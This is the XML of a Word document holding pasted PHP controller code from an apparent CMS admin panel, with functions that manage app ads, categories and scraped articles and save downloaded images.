    <w:p w14:paraId="5C88B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512D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3E1EE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9D4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2767F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BAF2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ABA0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CDBFE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B13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F978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2A119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6E0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C7DC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3B9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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D589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A6AD9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0032C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3681D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ppad')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE8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7792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7DFE8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8693C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8326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02FFE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C5641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140FFC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61E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9A8C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72FFC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328A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FEB6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156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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00604F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appad')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFE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CDB9F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089C1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DC9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ppAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0846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518DF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E218E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785803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38A4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ppad')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A327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db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA10E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76C7C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9D8F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44B2B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685C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2450A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ppad')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45441B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0D19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64CE8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148C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40A86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6E1E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929E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AC56F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35720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appad')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00864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3A958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15AE8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768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7E1B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8E72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CE5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531C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EA74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789B6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FE8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nction appconfig(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28077E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ad']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428326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C5E7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FCCB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3BA9C9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7BA13F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740C0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0D1C3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0E6FAF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6DAE2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4C86E6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t;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33A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ad.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6250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2CB4A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8745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121E7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B6B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EC11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10A9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E20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F69AA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3B4EC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7C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C6DD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C5FB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E9A76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6C57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0CC0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0DCBCD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E913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llection extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05054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6985C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0E2BE7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collection_type')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455D1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this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F202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2F72F0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87B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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3A6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BCBD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7434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A720F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14B9CC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36EB3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collection_type')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D9F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17BF1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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D1B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3A56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llection_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48121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96F83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625B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0129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4FE0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097BE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4867DB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llection_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53645E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C9AC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691609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D647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620939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F4B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868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54AB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E99D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collection_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E772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D424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1314B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DA05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C80A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A5D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2D4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B9C0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C24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3E0E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1A64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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8067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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC9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63660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B791B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llection_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501BC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5ED6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0F577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70EA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6BEA6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588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ED2E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B002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B409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DBED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1437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989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0449B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0D5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ule(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6C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6C214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E987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4AC00F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post['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45327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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B558E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51B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_decode($html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF0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9363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采集失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B92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525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9240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type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1E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1D4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78E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D5C1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CDA4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92FB9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F4E7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uledata(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5150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68C9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5AD2A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5D910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mychannel']){return ['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先点击你要采集目标分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B0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rls']=='urls'){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E755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rl('collection/ruledata',['mychannel'=&gt;$post['mychannel']])];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EB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83E0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rl'=&gt;url('collection')]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0B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F27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103B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type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC52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5D2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2AC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Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126405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assign('typeid',get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239AF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A083D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31E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A7C2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E12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uledataview(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE72E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2DF3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8AC4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53C50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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF0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lt;article id=\"J_article\" class=\"J-article article\"&gt;([\s\S]*?)&lt;\/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A6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html,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52308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rticle['1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F0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lt;h1 class=\"title\"&gt;(.*?)&lt;\/h1&gt;/", $article, $title);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F32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lt;span class="src"&gt;(.*?)&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来源：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(.*?)&lt;\/span&gt;/', $article, $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF8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lt;div id="content" class="J-article-content article-content"&gt;([\s\S]*?)&lt;\/div&gt;/', $article, $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A4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lt;(p.*?)&gt;/si","&lt;p&gt;",$content['1']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF137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lt;(\/?figure.*?)&gt;/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA01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lt;(\/?a.*?)&gt;/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37229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data.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44281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width.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521697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alt.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C36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preg_replace("/(style.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF88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src=\"(.*?)\"/",$content,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ED5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4598F9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  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A110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1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76023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2=$this-&gt;upload($img_1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBDAC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_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0B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str_replace($img_1,$img_2,$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B21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0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A99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img_2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAF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424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4A11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85A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8553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str_replace("\r\n","",$content);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECA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1'] &amp;&amp; $content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6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article')-&gt;where('title',$title['1'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72078A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264B7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lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E55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C40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8D145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gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66F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4DD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5D3E6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title['1'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB5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gt;      $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAF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ontent'       =&gt;      $content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2BF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gt;      $post['typeid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B348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strtotime($text['1'].":00"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE05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time'   =&gt;      strtotime($text['1'].":00"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBA7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urce'        =&gt;      $text['2'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4E9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          =&gt;      1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A85B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late'      =&gt;      '',  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA1E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           =&gt;      50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C98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gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36F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gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412B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s'         =&gt;      0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FA0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ick'         =&gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA9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gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B004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gt;      '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B01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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70087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DED2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insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539D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7CA58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lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6A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B673D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lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A15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E90D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B39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参数值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C773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A4C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888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错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BD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053D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71AC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52E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upload($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C191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ROOT_PATH . 'public/uploads';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE1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date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38302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d.'/'.$date.'/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A696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le_exists($d)){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4CC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kdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6EC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633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explode('.', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BAF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array_pop($geshi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71073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file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3138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4759E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC3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907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s=md5($img).'.'.$geshi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E14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sa=$date.'/'.md5($img).'.'.$geshi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D941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d.'/'.$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAB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d,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA1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ublic/uploads/".$geshisa;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFD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87A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outiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52F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26AF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D8769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toutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6D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3983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8D0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video(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C07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002F66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E83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1917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4D0DC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BB16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0F5CF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7C450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Typeid extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B22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35682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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C75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Db::name('typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F16A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get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F7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typedb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE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AD8B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E806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715B7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Db::name('typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1437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get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB468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db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03117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d=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68BB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FF96B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E988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validate('Typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE6B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post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C73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2E7BC0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time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C871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46B3F8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id']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140F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name=Db::name('typeid')-&gt;where(['title'=&gt;$post['title'],'tid'=&gt;0])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3559F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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57008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栏目名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09A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641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6D9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reate_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E592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insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDF6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BAC81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63F09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11B6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33061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C09C0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6D32F1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id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FC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A194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7BB23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14685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496B7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E1B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A281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842D3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validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C22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7E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10C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19EE4E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typeid')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66533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226F69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27351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C0C5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3F833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B33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25AB7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42B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544E2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5B7D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1E03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02F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD4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03A84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68CD62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A3E6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0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9B4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hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F06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id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CCE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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF4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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A55A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814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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D868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8CAA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id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886E1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98A9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arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB0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A253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rra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCA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B83F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55DDF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D614A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749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CC22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JAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9689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15EB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CFB7D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1452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ide_app(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B5B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201D2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8E52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9C95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0'=&gt;'APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE98D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ype='app';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6D5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id)-&gt;value('app');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089F9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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BC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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02474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F4A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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FBA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7161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id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF8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87B8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arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76383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1CD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rra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0D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0118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259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27235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84F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5AB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AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA4A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3BC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25653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CF7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del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172EC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使用采集文章不建议删除分类，否则会影响到采集文章关联分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79575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5B1DA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32658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1210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article')-&gt;where('typeid',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4DB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5C074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delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF92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80A7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25A885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D084E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2B2CD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771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A28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栏目下有文章，请先删除文章对应栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49593A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2D1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C23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59F97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0ED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F64F2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7EA83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0BA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95E3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D6F7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1(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAE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typeid/add',['mychannel'=&gt;'1','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394730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7B207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9A98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2(){</w:t>
      </w:r>
    </w:p>
